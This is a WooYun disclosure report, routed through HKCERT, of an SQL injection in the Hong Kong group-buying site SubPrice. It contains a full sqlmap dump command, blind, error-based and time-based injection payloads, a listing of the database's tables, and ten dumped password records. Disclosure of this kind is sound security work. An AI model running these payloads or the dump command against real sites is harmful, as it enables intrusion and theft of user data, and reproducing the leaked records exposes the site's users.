当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154470

漏洞标题:SubPrice團購網主站存在SQL植入攻擊(110個表+5W多用戶明文密碼泄露)(香港地區)

相关厂商:SubPrice團購網

漏洞作者: 路人甲

提交时间:2015-11-20 15:13

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-20: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

Sub Price subprice.hk致力為大家搜羅各樣"驚喜價",每日更新的今日Sub Price,潮流玩物,扮靚護膚,各樣美食等。包羅萬有,梗有樣合您心意。只要在限定時間內,有指定數量(或更多)志同道合的用家跟您一同購入優惠,即可以低至半價甚至一折,獨家感受surprise。

详细说明:

地址:http://**.**.**.**/index.php?m=Goods&a=show&suppliers_id=7&id=578

python sqlmap.py -u "http://**.**.**.**/index.php?m=Goods&a=show&suppliers_id=7&id=578" -p suppliers_id --technique=BET --random-agent --batch -D subprice_db -T fanwe_group_bond -C id,user_id,password --dump --start 1 --stop 10


back-end DBMS: MySQL 5.0
Database: subprice_db
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| fanwe_group_bond | 58627   |
+------------------+---------+

漏洞证明:

---
Parameter: suppliers_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=Goods&a=show&suppliers_id=7 AND 3662=3662&id=578
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m=Goods&a=show&suppliers_id=7 AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(9602=9602,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=578
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=Goods&a=show&suppliers_id=7 AND (SELECT * FROM (SELECT(SLEEP(5)))Oemz)&id=578
---
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] subprice_db


Database: subprice_db
[110 tables]
+----------------------------------+
| fanwe_admin                      |
| fanwe_admin_city                 |
| fanwe_adv                        |
| fanwe_adv_position               |
| fanwe_ajax_send                  |
| fanwe_article                    |
| fanwe_article_cate               |
| fanwe_attachment                 |
| fanwe_attachment_link            |
| fanwe_brand                      |
| fanwe_cart                       |
| fanwe_cart_card                  |
| fanwe_collect                    |
| fanwe_coupon                     |
| fanwe_coupon_region              |
| fanwe_coupon_send_log            |
| fanwe_currency                   |
| fanwe_delivery                   |
| fanwe_delivery_region            |
| fanwe_ecv                        |
| fanwe_ecv_type                   |
| fanwe_email_tool                 |
| fanwe_express                    |
| fanwe_goods                      |
| fanwe_goods_attr                 |
| fanwe_goods_cate                 |
| fanwe_goods_gallery              |
| fanwe_goods_reviews              |
| fanwe_goods_spec                 |
| fanwe_goods_spec_gallery         |
| fanwe_goods_spec_item            |
| fanwe_goods_type                 |
| fanwe_goods_type_attr            |
| fanwe_group_bond                 |
| fanwe_group_city                 |
| fanwe_group_message              |
| fanwe_group_message_follow       |
| fanwe_keywords                   |
| fanwe_lang_conf                  |
| fanwe_layout                     |
| fanwe_link                       |
| fanwe_log                        |
| fanwe_lottery                    |
| fanwe_lottery_goods              |
| fanwe_lottery_items              |
| fanwe_lottery_no                 |
| fanwe_lottery_settings           |
| fanwe_lottery_user               |
| fanwe_lottery_user_group         |
| fanwe_mail_address_list          |
| fanwe_mail_address_send_list     |
| fanwe_mail_list                  |
| fanwe_mail_send_list             |
| fanwe_mail_template              |
| fanwe_message                    |
| fanwe_nav                        |
| fanwe_order                      |
| fanwe_order_consignment          |
| fanwe_order_consignment_goods    |
| fanwe_order_goods                |
| fanwe_order_incharge             |
| fanwe_order_log                  |
| fanwe_order_promote              |
| fanwe_order_re_consignment       |
| fanwe_order_re_consignment_goods |
| fanwe_order_uncharge             |
| fanwe_payment                    |
| fanwe_payment_log                |
| fanwe_payment_money_log          |
| fanwe_promote                    |
| fanwe_promote_card               |
| fanwe_promote_child              |
| fanwe_promote_user_card          |
| fanwe_promote_user_group         |
| fanwe_referrals                  |
| fanwe_region_conf                |
| fanwe_role                       |
| fanwe_role_access                |
| fanwe_role_nav                   |
| fanwe_role_node                  |
| fanwe_send_list                  |
| fanwe_sms                        |
| fanwe_sms_mobile_verify          |
| fanwe_sms_send                   |
| fanwe_sms_send_log               |
| fanwe_sms_subscribe              |
| fanwe_smtp                       |
| fanwe_spec                       |
| fanwe_spec_type                  |
| fanwe_supplier_goods             |
| fanwe_suppliers                  |
| fanwe_suppliers_cate             |
| fanwe_suppliers_depart           |
| fanwe_sys_conf                   |
| fanwe_user                       |
| fanwe_user_consignee             |
| fanwe_user_extend                |
| fanwe_user_field                 |
| fanwe_user_group                 |
| fanwe_user_group_price           |
| fanwe_user_incharge              |
| fanwe_user_money_log             |
| fanwe_user_score_log             |
| fanwe_user_uncharge              |
| fanwe_vote                       |
| fanwe_vote_group                 |
| fanwe_vote_input                 |
| fanwe_vote_item                  |
| fanwe_vote_option                |
| fanwe_weight                     |
+----------------------------------+


Database: subprice_db
Table: fanwe_group_bond
[21 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| arr            | varchar(255) |
| buy_time       | int(11)      |
| create_time    | int(11)      |
| depart_id      | int(10)      |
| end_time       | int(11)      |
| goods_id       | int(11)      |
| goods_name     | varchar(255) |
| id             | int(11)      |
| is_lookat      | tinyint(1)   |
| is_send_msg    | tinyint(1)   |
| is_valid       | tinyint(1)   |
| msg_length     | int(11)      |
| order_goods_id | int(10)      |
| order_id       | varchar(200) |
| password       | varchar(255) |
| send_count     | int(10)      |
| sn             | varchar(255) |
| start_time     | datetime     |
| status         | tinyint(1)   |
| use_time       | int(11)      |
| user_id        | int(11)      |
+----------------+--------------+


back-end DBMS: MySQL 5.0
Database: subprice_db
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| fanwe_group_bond | 58627   |
+------------------+---------+


选取其中10个进行展示:

Database: subprice_db
Table: fanwe_group_bond
[10 entries]
+-----+---------+----------+
| id  | user_id | password |
+-----+---------+----------+
| 179 | 0       | 32653038 |
| 180 | 0       | 65666264 |
| 181 | 63      | 34366135 |
| 182 | 0       | 36386164 |
| 183 | 0       | 34386332 |
| 184 | 0       | 36383166 |
| 185 | 0       | 64633930 |
| 186 | 0       | 30306364 |
| 187 | 0       | 66343039 |
| 188 | 0       | 61383539 |
+-----+---------+----------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-24 12:17

厂商回复:

Referred to related parties.

最新状态:

暂无

漏洞评价:

评价